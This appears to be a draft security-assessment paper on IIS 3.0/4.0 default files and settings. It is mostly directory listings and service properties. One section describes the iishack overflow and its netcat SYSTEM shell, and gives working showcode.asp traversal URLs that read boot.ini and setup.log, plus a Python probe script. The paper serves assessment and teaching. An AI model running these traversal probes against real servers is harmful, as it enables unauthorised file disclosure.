Directory of D:\InetPub\wwwroot\samples\htmlsamp

01/08/99 07:58a <DIR> .
01/08/99 07:58a <DIR> ..
10/13/96 08:38p 1,598 htmlsamp.htm
10/13/96 08:38p 2,084 styles.htm
10/13/96 08:38p 1,483 styles2.htm
10/13/96 08:38p 1,393 tables.htm
6 File(s) 6,558 bytes

Directory of D:\InetPub\wwwroot\samples\images

01/08/99 07:58a <DIR> .
01/08/99 07:58a <DIR> ..
10/13/96 08:38p 10,282 backgrnd.gif
10/13/96 08:38p 982 bullet_d.gif
10/13/96 08:38p 972 bullet_h.gif
10/13/96 08:38p 978 bullet_p.gif
10/13/96 08:38p 987 bullet_s.gif
10/13/96 08:38p 983 bullet_t.gif
10/13/96 08:38p 4,244 db_mh.gif
10/13/96 08:38p 174 db_mh.map
10/13/96 08:38p 2,893 docs.gif
10/13/96 08:38p 4,048 html_mh.gif
10/13/96 08:38p 182 html_mh.map
10/13/96 08:38p 3,037 h_browse.gif
10/13/96 08:38p 5,081 h_logo.gif
10/13/96 08:38p 6,060 h_samp.gif
10/13/96 08:38p 239 h_samp.map
10/13/96 08:38p 3,256 mh2.gif
10/13/96 08:38p 5,701 mh_data.gif
10/13/96 08:38p 201 mh_data.map
10/13/96 08:38p 5,834 mh_html.gif
10/13/96 08:38p 197 mh_html.map
10/13/96 08:38p 5,530 mh_prog.gif
10/13/96 08:38p 203 mh_prog.map
10/13/96 08:38p 5,556 mh_sampl.gif
10/13/96 08:38p 282 mh_sampl.map
10/13/96 08:38p 2,758 powered.gif
10/13/96 08:38p 4,406 p_mh.gif
10/13/96 08:38p 170 p_mh.map
10/13/96 08:38p 844 space.gif
10/13/96 08:38p 824 space2.gif
10/13/96 08:38p 2,513 tools.gif
10/13/96 08:38p 3,990 t_mh.gif
10/13/96 08:38p 134 t_mh.map
34 File(s) 83,541 bytes

Directory of D:\InetPub\wwwroot\samples\isapi

01/08/99 07:58a <DIR> .
01/08/99 07:58a <DIR> ..
01/13/99 04:54p 2,541 drop.htm
10/13/96 08:38p 1,065 favlist.htm
10/13/96 08:38p 1,249 isapi.htm
10/13/96 08:38p 634 srch.htm
6 File(s) 5,489 bytes

Directory of D:\InetPub\wwwroot\samples\sampsite

01/08/99 07:58a <DIR> .
01/08/99 07:58a <DIR> ..
10/13/96 08:38p 2,729 about.htm
01/08/99 07:58a <DIR> avi
10/13/96 08:38p 15,768 balo.wav
10/13/96 08:38p 2,522 catalog.htm
10/13/96 08:38p 3,039 default.htm
10/13/96 08:38p 70,916 drums.wav
01/08/99 07:58a <DIR> images
10/13/96 08:38p 1,602 process.htm
10/13/96 08:38p 1,517 results.htm
10/13/96 08:38p 1,066 sampsite.htm
10/13/96 08:38p 1,567 sendme.htm
10/13/96 08:38p 2,061 taste.htm
14 File(s) 102,787 bytes

Directory of D:\InetPub\wwwroot\samples\sampsite\avi

01/08/99 07:58a <DIR> .
01/08/99 07:58a <DIR> ..
10/13/96 08:38p 58,094 cup.avi
10/13/96 08:38p 6,039 cupalt.gif
10/13/96 08:38p 4,799 grindalt.gif
10/13/96 08:38p 88,828 grinder.avi
10/13/96 08:38p 4,688 sampalt.gif
10/13/96 08:38p 88,522 sample.avi
8 File(s) 250,970 bytes

Directory of D:\InetPub\wwwroot\samples\sampsite\images

01/08/99 07:58a <DIR> .
01/08/99 07:58a <DIR> ..
10/13/96 08:38p 2,833 aboutsm.gif
10/13/96 08:38p 5,857 bag2.gif
10/13/96 08:38p 2,693 catsm.gif
10/13/96 08:38p 3,899 cup.gif
10/13/96 08:38p 6,563 gift2.gif
10/13/96 08:38p 7,983 habout.gif
10/13/96 08:38p 7,800 hcatalog.gif
10/13/96 08:38p 32,777 headersm.gif
10/13/96 08:38p 8,312 hproc.gif
10/13/96 08:38p 9,605 hsend.gif
10/13/96 08:38p 7,251 htaste.gif
10/13/96 08:38p 1,330 location.gif
10/13/96 08:38p 2,660 mainsm.gif
10/13/96 08:38p 5,893 mug2.gif
10/13/96 08:38p 3,190 procsm.gif
10/13/96 08:38p 2,192 search.gif
10/13/96 08:38p 4,503 sendsm.gif
10/13/96 08:38p 2,267 tastesm.gif
10/13/96 08:38p 14,772 tiled.gif
10/13/96 08:38p 657 time.gif
10/13/96 08:38p 3,273 voltiny.gif
23 File(s) 136,310 bytes

Total Files Listed:
116 File(s) 605,023 bytes
534,112,256 bytes free

IIS 3.0 WWW Default Service Properties

Services
  TCP Port                          80
  Connection Timeout                900
  Maximum Connections               100000
  Anonymous Username                IUSR_<MACHINENAME>
  Anonymous Password                <RANDOM>
  Allow Anonymous                   <Selected>
  Basic (Clear Text)                <Unselected>
  Windows NT Challenge/Response     <Selected>
  Comment                           <NONE>

Directories
  Directory                         Alias
  \InetPub\wwwroot                  <HOME> (Read)
  \InetPub\scripts                  /scripts (Execute)
  \WINNT\System32\inetsrv\iisadmin  /iisadmin (Read)
  Enable Default Document           <Selected>
  Default Document                  Default.htm
  Directory Browsing Allowed        <Unselected>

Logging
  Enable Logging                    <Selected>
  Log to File                       <Selected>
  Log Format                        Standard Format
  Automatically open new log        <Selected> (Daily)
  Log File Directory                \WINNT\System32\LogFiles
  Log to SQL Database               <Unselected>
  Log File Name                     INyymmdd.log

Advanced
  By default, all computers will be granted access,
  except those listed below:                              <BLANK>
  Limit Network Use by all Internet Services on this computer: <Unselected>

IIS 3.0 FTP Default Service Properties

Services
TCP Port 21
Connection Timeout 900
Maximum Connections 1000
Allow Anonymous Connections <Selected>
Anonymous Username IUSR_<MACHINENAME>
Anonymous Password <RANDOM>
Allow Only Anonymous Connections <Selected>
Comment <NONE>

Messages
Welcome Message <NONE>
Exit Message <NONE>
Maximum Connections Message <NONE>

Directories
Directory Alias
\InetPub\ftproot <HOME> (Read)
Directory Listing Style <UNIX>

Logging
Enable Logging <Selected>
Log to File <Selected>
Log Format Standard Format
Automatically open new log <Selected> (Daily)
Log File Directory \WINNT\System32\LogFiles
Log to SQL Database <Unselected>
Log File Name INyymmdd.log

Advanced
By Default, all computers will be Granted Access
Except those listed below <BLANK>
Limit Network Use by all Internet Services on this computer <Unselected>

IIS 3.0 Gopher Default Service Properties

Services
TCP Port 70
Connection Timeout 900
Maximum Connections 1000
Service Administrator Administrator
Email Admin@corp.com
Anonymous Username IUSR_<MACHINENAME>
Anonymous Password <RANDOM>
Comment <NONE>

Directories
Directory Alias
\InetPub\gophroot <HOME>

Logging
Enable Logging <Selected>
Log to File <Selected>
Log Format Standard Format
Automatically open new log <Selected> (Daily)
Log File Directory \WINNT\System32\LogFiles
Log to SQL Database <Unselected>
Log File Name INyymmdd.log

Advanced
By Default, all computers will be Granted Access
Except those listed below <BLANK>
Limit Network Use by all Internet Services on this computer <Unselected>

Microsoft Internet Information Server 4.0

IIS Remote Overflow

IIS 4.0 contains a remotely exploitable buffer overflow that yields code execution on the
server. Jimmy has ported the public exploit, known as “iishack”, to Linux. The exploit launches
a netcat executable on the target; because it runs in the security context of the IIS service,
the resulting shell is the “System” account. The exploit is version-specific, so confirm the
target is reporting itself as IIS 4.0 (Server: Microsoft-IIS/4.0) before using it.

<Insert Jimmy’s Document here>

As with release 3.0 of IIS, several “sample” applications are installed by default and are rarely
removed, even when a site has since deployed an entirely new web presence. Because they live
at fixed paths, these sample files can be called by direct URL reference even when nothing on
the live site links to them. Some of them disclose information about the server, while others
provide other interesting features.

http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp

Showcode.asp is a sample utility that displays the source code of an ASP file named in its
source parameter. Because the script does not reject “..” in that parameter, an attacker can use
the “..” traversal style to read any file on the server. NTFS ACLs still apply: the file is read in
the security context of the requesting web user (IUSR_<MACHINENAME> for anonymous requests),
so only files that account is permitted to read are disclosed. This is all covered in a L0pht
advisory (http://www.l0pht.com/advisories.html).

?source=/msadc/Samples/../../../../../boot.ini

This parameter appended to the URL above will show the boot.ini file.

?source=/msadc/Samples/../../../../../winnt/repair/setup.log

This parameter appended to the showcode.asp command will show the setup.log file.

Several other nuances of this command can be leveraged to gather information from the
server. While showcode.asp will not show directory listings, the error codes it returns can be
used to test whether a directory exists:

?source=/msadc/Samples/../../../../../winnt/repaire

This parameter elicits “Server object error 'ASP 0177 : 800a0035'” (the path does not exist).

?source=/msadc/Samples/../../../../../winnt/repair

This parameter elicits “Server object error 'ASP 0177 : 800a0046'” (the path exists).

The low-order word of each code is the VB runtime error number: 0x35 is error 53, “File not
found”, and 0x46 is error 70, “Permission denied”, which is what opening a directory as a file
produces. Note that an existing file the web user’s account is not allowed to read also yields
800a0046, so the second response means “something is there”, not necessarily “a directory”.
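The probe described above, as an added example that is not part of the original paper: it builds the showcode.asp traversal URL for any target path and interprets the response by the ASP error code, so a list of candidate directories can be checked in one pass. The host name, the candidate paths and the canned responses used by demo() are constructed for illustration; only fetch() touches the network.

```python
"""Probe helpers for the showcode.asp traversal described above.

Added example (not from the paper).  Everything except fetch() is pure, so the
classifier can be exercised offline against the canned responses in demo().
"""
import re
from urllib.error import HTTPError
from urllib.parse import quote
from urllib.request import urlopen

SHOWCODE = "/msadc/Samples/SELECTOR/showcode.asp"

# The low-order word of the HRESULT quoted in the ASP error is the VB runtime
# error number: 0x35 = 53 "File not found", 0x46 = 70 "Permission denied".
# Opening a directory (or a file IUSR_<MACHINENAME> may not read) gives 70.
ERROR_CODES = {
    "800a0035": "path-missing",
    "800a0046": "path-exists",
}
ASP_ERROR_RE = re.compile(r"ASP 0177\s*:\s*(800a[0-9a-fA-F]{4})")


def build_url(base, target, depth=5):
    """showcode.asp URL that climbs `depth` levels above /msadc/Samples and then
    descends into `target` (a path relative to the drive root, e.g. 'winnt/repair').

    Five levels matches the paper's URLs and assumes the default MDAC location
    C:\\Program Files\\Common Files\\System\\msadc\\Samples.  `base` is assumed
    to be 'http://host' with no trailing slash.
    """
    rel = target.lstrip("/\\").replace("\\", "/")
    source = "/msadc/Samples/" + "../" * depth + rel
    return base + SHOWCODE + "?source=" + quote(source, safe="/.")


def classify(status, body):
    """Interpret one response: 'not-installed', 'path-missing', 'path-exists',
    'file-read' or 'unknown'."""
    if status == 404:
        return "not-installed"          # showcode.asp itself is gone
    match = ASP_ERROR_RE.search(body)
    if match:
        return ERROR_CODES.get(match.group(1).lower(), "unknown")
    if status == 200 and body.strip():
        return "file-read"              # the target's contents came back
    return "unknown"


def fetch(url, timeout=10):
    """(status, body) for `url`; the only function that touches the network."""
    try:
        with urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read().decode("latin-1", "replace")
    except HTTPError as err:
        return err.code, err.read().decode("latin-1", "replace")


def probe_dirs(base, candidates, fetch_fn=fetch):
    """Classify each candidate path via showcode.asp."""
    return {c: classify(*fetch_fn(build_url(base, c))) for c in candidates}


# Constructed responses (not captured from a real server), shaped like the
# error strings quoted in the text, so the logic above can be run offline.
CANNED = {
    "winnt/repaire": (500, "Server object error 'ASP 0177 : 800a0035'"),
    "winnt/repair":  (500, "Server object error 'ASP 0177 : 800a0046'"),
    "boot.ini":      (200, "[boot loader]\ntimeout=30\n"),
}


def canned_fetch(url):
    for path, response in CANNED.items():
        if url.endswith("/" + path):
            return response
    return 404, ""


def demo(base="http://www.someserver.com"):
    """Run the probe against the canned responses instead of a live host."""
    return probe_dirs(base, list(CANNED), fetch_fn=canned_fetch)
```

Run probe_dirs(base, [...]) against a host you are authorised to test; demo() exercises the same code path against the canned responses so the classifier can be checked without a target.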

IIS 4.0 WWW Server Default Files and Directories:

Volume in drive C has no label.
Volume Serial Number is EA37-8613

Directory of C:\INETPUB

05/12/99 03:07p <DIR> .
05/12/99 03:07p <DIR> ..
05/12/99 03:07p <DIR> Mailroot
05/12/99 03:08p <DIR> wwwroot
05/12/99 03:09p <DIR> iissamples
05/12/99 03:14p <DIR> Mail
05/12/99 03:17p <DIR> scripts
05/12/99 03:18p <DIR> ftproot
05/12/99 03:18p <DIR> Catalog.wci
05/14/99 03:38p 0 dirlist.txt
10 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot

05/12/99 03:07p <DIR> .
05/12/99 03:07p <DIR> ..
05/12/99 03:18p <DIR> Queue
05/12/99 03:18p <DIR> Badmail
05/12/99 03:18p <DIR> Drop
05/12/99 03:18p <DIR> Pickup
05/12/99 03:18p <DIR> SortTemp
05/12/99 03:18p <DIR> Route
05/12/99 03:18p <DIR> Mailbox
9 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Queue

05/12/99 03:18p <DIR> .
05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Badmail

05/12/99 03:18p <DIR> .
05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Drop

05/12/99 03:18p <DIR> .
05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Pickup

05/12/99 03:18p <DIR> .
05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\SortTemp

05/12/99 03:18p <DIR> .
05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Route

05/12/99 03:18p <DIR> .
05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Mailbox

05/12/99 03:18p <DIR> .
05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot

05/12/99 03:08p <DIR> .
05/12/99 03:08p <DIR> ..
05/12/99 03:23p 4,663 default.asp
05/12/99 03:23p 2,504 postinfo.html
05/12/99 03:23p <DIR> _private
05/12/99 03:23p <DIR> cgi-bin
05/12/99 03:23p <DIR> images
05/12/99 03:23p 1,759 _vti_inf.html
8 File(s) 8,926 bytes

Directory of C:\INETPUB\wwwroot\_vti_pvt

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
05/12/99 03:23p 0 service.lck
05/12/99 03:23p 582 service.cnf
05/12/99 03:23p 25 access.cnf
05/12/99 03:23p 3 services.cnf
05/12/99 03:23p 25 bots.cnf
05/12/99 03:23p 25 botinfs.cnf
05/12/99 03:23p 5,616 doctodep.btr
05/12/99 03:23p 324 deptodoc.btr
05/12/99 03:23p 25 writeto.cnf
05/12/99 03:23p 600 linkinfo.cnf
12 File(s) 7,225 bytes

Directory of C:\INETPUB\wwwroot\_vti_log

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot\_private

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot\_vti_txt

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot\_vti_cnf

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
05/12/99 03:23p 985 default.asp
3 File(s) 985 bytes

Directory of C:\INETPUB\wwwroot\_vti_bin

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
05/12/99 03:23p 107,008 fpcount.exe
05/12/99 03:23p 14,608 shtml.dll
4 File(s) 121,616 bytes

Directory of C:\INETPUB\wwwroot\_vti_bin\_vti_adm

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
05/12/99 03:23p 15,120 admin.dll
3 File(s) 15,120 bytes

Directory of C:\INETPUB\wwwroot\_vti_bin\_vti_aut

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
05/12/99 03:23p 6,416 dvwssr.dll
05/12/99 03:23p 15,120 author.dll
4 File(s) 21,536 bytes

Directory of C:\INETPUB\wwwroot\cgi-bin

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
05/12/99 03:23p 7,952 htimage.exe
05/12/99 03:23p 6,416 imagemap.exe
4 File(s) 14,368 bytes

Directory of C:\INETPUB\wwwroot\cgi-bin\_vti_cnf

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
05/12/99 03:23p 216 htimage.exe
05/12/99 03:23p 216 imagemap.exe
4 File(s) 432 bytes

Directory of C:\INETPUB\wwwroot\images

05/12/99 03:23p <DIR> .
05/12/99 03:23p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\iissamples

05/12/99 03:09p <DIR> .
05/12/99 03:09p <DIR> ..
05/12/99 03:09p <DIR> default
05/12/99 03:14p <DIR> ISSamples
4 File(s) 0 bytes

Directory of C:\INETPUB\iissamples\default

05/12/99 03:09p <DIR> .
05/12/99 03:09p <DIR> ..
08/07/97 04:10p 8,609 ie.gif
08/07/97 04:10p 388 msft.gif
09/05/97 09:16a 15,076 iisnav.gif
10/12/97 07:17a 14,687 IISSide.gif
09/08/97 07:31a 21,318 iistitle.gif
10/25/97 08:31a 10,170 learn.asp
09/05/97 09:16a 1,911 nav2.gif
10/25/97 08:31a 6,001 samples.asp
09/05/97 09:16a 2,471 squiggle.gif
11 File(s) 80,631 bytes

Directory of C:\INETPUB\iissamples\ISSamples

05/12/99 03:14p <DIR> .
05/12/99 03:14p <DIR> ..
10/14/97 07:06a 11,264 ixgerman.doc
10/14/97 07:06a 16,384 ixserver.doc
10/14/97 07:06a 56,320 ixserver.ppt
10/14/97 07:06a 40,960 ixserver.xls
10/09/97 12:57p 7,438 adovbs.inc
10/14/97 07:06a 18,636 advquery.asp
10/14/97 07:06a 18,431 advsqlq.asp
10/09/97 12:57p 252 default.htm
10/09/97 12:57p 594 deferror.htx
10/14/97 04:48p 3,727 fastq.htm
10/14/97 07:06a 4,521 fastq.htx
10/14/97 04:48p 4,153 fastq.idq
10/14/97 07:06a 902 hilight.gif
10/09/97 12:57p 579 htxerror.htx
10/09/97 12:57p 576 idqerror.htx
10/14/97 07:06a 1,131 is2bkgnd.gif
10/14/97 04:48p 883 is2foot.inc
10/14/97 07:06a 14,830 is2logo.gif
10/14/97 07:06a 17,824 is2side.gif
10/14/97 07:06a 1,953 is2style.css
10/14/97 07:06a 8,609 ie.gif
10/21/97 03:09a 42,069 ixqlang.htm
10/21/97 03:09a 4,314 ixtiphlp.htm
10/14/97 07:06a 4,496 ixtipsql.htm
10/09/97 12:57p 8,276 ixtrasp.asp
10/09/97 12:57p 1,279 navbar.htm
10/14/97 07:06a 10,646 nts_iis.gif
05/12/99 03:14p <DIR> oop
10/21/97 03:09a 14,749 query.asp
10/21/97 03:09a 4,301 query.htm
10/14/97 07:06a 11,458 query.htx
10/14/97 07:06a 3,520 query.idq
10/14/97 07:06a 998 rankbtn1.gif
10/14/97 07:06a 1,088 rankbtn2.gif
10/14/97 07:06a 1,165 rankbtn3.gif
10/14/97 07:06a 1,230 rankbtn4.gif
10/14/97 07:06a 1,301 rankbtn5.gif
10/09/97 12:57p 597 reserror.htx
10/14/97 07:06a 3,633 sqlqhit.asp
10/14/97 07:06a 5,984 sqlqhit.htm
42 File(s) 351,071 bytes

Directory of C:\INETPUB\iissamples\ISSamples\oop

05/12/99 03:14p <DIR> .
05/12/99 03:14p <DIR> ..
10/14/97 04:48p 2,600 qfullhit.htw
10/14/97 04:48p 2,249 qsumrhit.htw
4 File(s) 4,849 bytes

Directory of C:\INETPUB\Mail

05/12/99 03:14p <DIR> .
05/12/99 03:14p <DIR> ..
05/12/99 03:14p <DIR> Smtp
3 File(s) 0 bytes

Directory of C:\INETPUB\Mail\Smtp

05/12/99 03:14p <DIR> .
05/12/99 03:14p <DIR> ..
05/12/99 03:14p <DIR> Admin
3 File(s) 0 bytes

Directory of C:\INETPUB\Mail\Smtp\Admin

05/12/99 03:14p <DIR> .
05/12/99 03:14p <DIR> ..
10/05/97 04:27a 12,001 smtpread.txt
05/12/99 03:14p <DIR> Help
10/12/97 06:40a 286 global.asa
10/12/97 06:40a 58 blank.htm
10/12/97 06:40a 142 default.htm
10/12/97 06:40a 2,400 nre.asp
10/12/97 06:40a 159 nyi.htm
10/20/97 02:26a 1,444 smabout.asp
10/15/97 03:07a 10,019 smaccess.asp
10/12/97 06:40a 1,089 smadv.asp
10/12/97 06:40a 1,632 smadvbd.asp
10/12/97 06:40a 7,697 smadved.asp
10/22/97 06:31a 16,876 smadvhd.asp
10/20/97 02:26a 16,942 smadvhd.asp.2
10/12/97 06:40a 7,860 smadvls.asp
10/16/97 02:53a 8,686 smau.asp
10/12/97 06:40a 5,799 smbld.asp
10/12/97 06:40a 498 smchklen.htm
10/12/97 06:40a 7,528 smcomm.asp
10/12/97 06:40a 1,645 smcon.asp
10/12/97 06:40a 3,533 smconn.asp
10/20/97 02:26a 12,683 smdel.asp
10/12/97 06:40a 4,080 smdistb.asp
10/12/97 06:40a 716 smdom.asp
10/20/97 02:26a 35,570 smdomed.asp
10/19/97 02:26a 11,149 smdomhd.asp
10/12/97 06:40a 1,485 smdomls.asp
10/12/97 06:40a 389 smeredir.asp
10/12/97 06:40a 4,702 smerrors.asp
10/12/97 06:40a 829 smfpop.asp
10/12/97 06:40a 358 smgetval.htm
10/20/97 02:26a 3,033 smhd.asp
10/12/97 06:40a 253 smisfull.htm
10/12/97 06:40a 361 smisnum.htm
10/12/97 06:40a 592 smlist.asp
10/18/97 02:17a 13,696 smmes.asp
10/16/97 02:53a 21,510 smmnu.asp
10/12/97 06:40a 2,263 smmnums.asp
10/12/97 06:40a 2,053 smmnuns.asp
10/12/97 06:40a 595 smmnus.asp
10/20/97 02:26a 12,805 smosec.asp
10/12/97 06:40a 230 smpop.asp
10/12/97 06:40a 225 smpophd.asp
10/12/97 06:40a 1,594 smredir.asp
10/15/97 03:07a 3,397 smsec.asp
10/17/97 02:20a 16,833 smser.asp
10/12/97 06:40a 712 smses.asp
10/12/97 06:40a 8,168 smseshd.asp
10/12/97 06:40a 2,282 smsesls.asp
10/12/97 06:40a 390 smsetval.htm
10/12/97 06:40a 938 smslist.asp
10/12/97 06:40a 4,380 smsrv.asp
10/12/97 06:40a 734 smstat.asp
10/12/97 06:40a 10,954 smtl.asp
10/19/97 02:26a 3,344 smtp.asp
10/15/97 03:07a 7,995 smtree.asp
10/12/97 06:40a 10,528 smvs.asp
10/12/97 06:40a 2,060 srtb.asp
10/12/97 06:40a 60 version.htm
10/12/97 06:40a 338 _cnst.asp
05/12/99 03:14p <DIR> Images
63 File(s) 310,578 bytes

Directory of C:\INETPUB\Mail\Smtp\Admin\Help

05/12/99 03:14p <DIR> .
05/12/99 03:14p <DIR> ..
10/18/97 02:14a 63,029 smtpsnap.hlp
10/07/97 02:56a 344 smtpsnap.cnt
10/07/97 02:56a 29,331 smtpcfg.hlp
10/12/97 06:40a 1,681 sec128.htm
10/12/97 06:40a 1,525 secchan.htm
10/12/97 06:40a 1,115 sesdall.htm
10/12/97 06:40a 1,151 sesdisc.htm
10/12/97 06:40a 931 sesfrom.htm
10/12/97 06:40a 937 sesnext.htm
10/12/97 06:40a 952 sesprev.htm
10/12/97 06:40a 1,103 sesrfrsh.htm
10/12/97 06:40a 958 sestime.htm
10/12/97 06:40a 978 sesuser.htm
10/18/97 02:17a 4,131 smadvh.htm
10/18/97 02:17a 4,206 smauh.htm
10/12/97 06:40a 2,292 smcommh.htm
10/12/97 06:40a 4,972 smdelh.htm
10/12/97 06:40a 3,623 smdomedh.htm
10/12/97 06:40a 3,081 smdomh.htm
10/12/97 06:40a 4,261 smmesh.htm
10/12/97 06:40a 1,785 smsech.htm
10/12/97 06:40a 3,930 smserh.htm
10/12/97 06:40a 3,870 smsesh.htm
10/18/97 02:17a 1,411 smsrvh.htm
10/12/97 06:40a 947 start.htm
10/12/97 06:40a 946 stop.htm
10/12/97 06:40a 1,060 temp.htm
10/12/97 06:40a 1,001 testfr.htm
10/12/97 06:40a 1,084 title.htm
10/12/97 06:40a 4,496 toc.htm
10/12/97 06:40a 1,099 tocframe.htm
10/12/97 06:40a 1,131 vsdesc.htm
10/12/97 06:40a 1,165 vsipaddr.htm
10/12/97 06:40a 2,400 welcome.htm
10/12/97 06:40a 1,055 dmremv.htm
10/12/97 06:40a 1,158 dmroute.htm
10/12/97 06:40a 2,045 dmtype.htm
10/12/97 06:40a 1,690 dmusessl.htm
10/12/97 06:40a 1,771 mbaddir.htm
10/12/97 06:40a 1,349 mbadto.htm
10/12/97 06:40a 1,436 mlimcon.htm
10/12/97 06:40a 2,318 mlimit.htm
10/12/97 06:40a 1,831 mmsgsize.htm
10/12/97 06:40a 1,325 mndrto.htm
10/12/97 06:40a 983 mreset.htm
10/12/97 06:40a 987 msave.htm
10/12/97 06:40a 1,671 msessize.htm
10/12/97 06:40a 960 pause.htm
10/12/97 06:40a 2,551 props.htm
10/12/97 06:40a 1,120 refresh.htm
10/12/97 06:40a 964 resume.htm
10/12/97 06:40a 1,762 dlmaxhop.htm
10/12/97 06:40a 1,579 dlmaxrt.htm
10/12/97 06:40a 1,710 dlqual.htm
10/12/97 06:40a 1,207 dlretint.htm
10/12/97 06:40a 1,451 dlrev.htm
10/12/97 06:40a 1,812 dlsmart.htm
10/12/97 06:40a 1,253 dlssl.htm
10/12/97 06:40a 1,271 dltype.htm
10/12/97 06:40a 3,533 dmadd.htm
10/12/97 06:40a 1,266 dmalias.htm
10/12/97 06:40a 1,957 dmaloc.htm
10/12/97 06:40a 1,570 dmaname.htm
10/12/97 06:40a 1,289 dmdefloc.htm
10/12/97 06:40a 1,469 dmdrop.htm
10/12/97 06:40a 2,785 dmedit.htm
10/12/97 06:40a 1,715 dmlocdom.htm
10/12/97 06:40a 1,941 dmname.htm
10/12/97 06:40a 1,675 dmremote.htm
10/12/97 06:40a 1,444 conlimit.htm
10/12/97 06:40a 1,118 connect.htm
10/12/97 06:40a 1,050 conport.htm
10/12/97 06:40a 1,242 contout.htm
10/18/97 02:17a 993 delete.htm
10/12/97 06:40a 1,652 dlattmpt.htm
10/12/97 06:40a 1,279 dlmasq.htm
10/18/97 02:17a 1,280 autls.htm
10/18/97 02:17a 1,144 auacct.htm
10/18/97 02:17a 1,480 auchacct.htm
10/18/97 02:17a 1,502 auchnt.htm
10/18/97 02:17a 1,276 auclear.htm
10/18/97 02:17a 1,086 aunoauth.htm
10/18/97 02:17a 1,177 auntacct.htm
10/18/97 02:17a 1,307 auntcr.htm
10/12/97 06:40a 1,337 condir.htm
10/12/97 06:40a 2,962 colegal.htm
88 File(s) 236,714 bytes

Directory of C:\INETPUB\Mail\Smtp\Admin\Images

05/12/99 03:14p <DIR> .
05/12/99 03:14p <DIR> ..
10/12/97 06:39a 1,018 mailbox.gif
10/12/97 06:40a 81 plus.gif
10/12/97 06:40a 82 plusl.gif
10/12/97 06:40a 883 popup.gif
10/12/97 06:40a 82 radiooff.gif
10/12/97 06:40a 84 radioon.gif
10/12/97 06:40a 880 refr.gif
10/12/97 06:40a 881 remv.gif
10/12/97 06:40a 899 roll.gif
10/12/97 06:40a 300 rte.gif
10/12/97 06:40a 888 save.gif
10/12/97 06:40a 148 slideron.gif
10/12/97 06:40a 166 slidersp.gif
10/12/97 06:40a 176 slidrend.gif
10/12/97 06:40a 182 slidroff.gif
10/12/97 06:40a 126 smallkey.gif
10/12/97 06:40a 49 space.gif
10/12/97 06:40a 869 stop.gif
10/12/97 06:39a 818 tablcor.gif
10/12/97 06:40a 49 tabline.gif
10/12/97 06:40a 49 tabottom.gif
10/12/97 06:39a 817 tabrcor.gif
10/12/97 06:39a 800 tabrline.gif
10/12/97 06:40a 583 tabs.gif
10/12/97 06:39a 800 tabwdot.gif
10/12/97 06:40a 269 tbasp.gif
10/12/97 06:40a 273 tbasp0.gif
10/12/97 06:40a 251 tbisapi.gif
10/12/97 06:40a 157 tbother.gif
10/12/97 06:40a 149 updir.gif
10/12/97 06:40a 1,600 vbscript.gif
10/12/97 06:40a 165 vdir0.gif
10/12/97 06:40a 163 vdir2.gif
10/12/97 06:40a 163 vdir4.gif
10/12/97 06:39a 7,667 vrsvrwiz.gif
10/12/97 06:40a 225 www0.gif
10/12/97 06:40a 167 www2.gif
10/12/97 06:40a 224 www4.gif
10/12/97 06:40a 1,515 wwwprop.gif
10/12/97 06:40a 369 mime.gif
10/12/97 06:40a 75 minus.gif
10/12/97 06:40a 76 minusl.gif
10/12/97 06:40a 869 new.gif
10/12/97 06:40a 874 next.gif
10/12/97 06:40a 205 off.gif
10/12/97 06:40a 897 ok.gif
10/12/97 06:40a 202 on.gif
10/12/97 06:40a 880 open.gif
10/12/97 06:40a 877 pause.gif
10/12/97 06:40a 1,929 ism.gif
10/12/97 06:40a 3,187 ismhd.gif
10/12/97 06:40a 224 key.gif
10/12/97 06:40a 62 line.gif
10/12/97 06:40a 2,609 loading.gif
10/12/97 06:40a 139 lock.gif
10/12/97 06:40a 1,231 logo.gif
10/12/97 06:40a 869 gnicnew.gif
10/12/97 06:40a 874 gnicnext.gif
10/12/97 06:40a 904 gnicok.gif
10/12/97 06:40a 877 gnicprev.gif
10/12/97 06:40a 880 gnicrefr.gif
10/12/97 06:40a 908 gnicremv.gif
10/12/97 06:40a 906 gnicroll.gif
10/12/97 06:40a 888 gnicsave.gif
10/12/97 06:40a 47 gnictoc0.gif
10/12/97 06:40a 64 gnictoc1.gif
10/12/97 06:40a 64 gnictoc2.gif
10/12/97 06:40a 837 gnicttl.gif
10/12/97 06:40a 860 gnicup.gif
10/12/97 06:40a 267 handshk.gif
10/12/97 06:40a 893 help.gif
10/12/97 06:40a 130 helpnote.gif
10/12/97 06:40a 15,076 iisnav.gif
10/20/97 02:26a 13,033 iisttl.gif
10/12/97 06:40a 173 ftp4.gif
10/12/97 06:40a 1,373 ftpprop.gif
10/12/97 06:40a 919 globe.gif
10/12/97 06:40a 9,920 gnback.gif
10/12/97 06:40a 229 gnicabou.gif
10/12/97 06:40a 98 gniccncl.gif
10/12/97 06:40a 152 gniccomg.gif
10/12/97 06:40a 156 gniccoms.gif
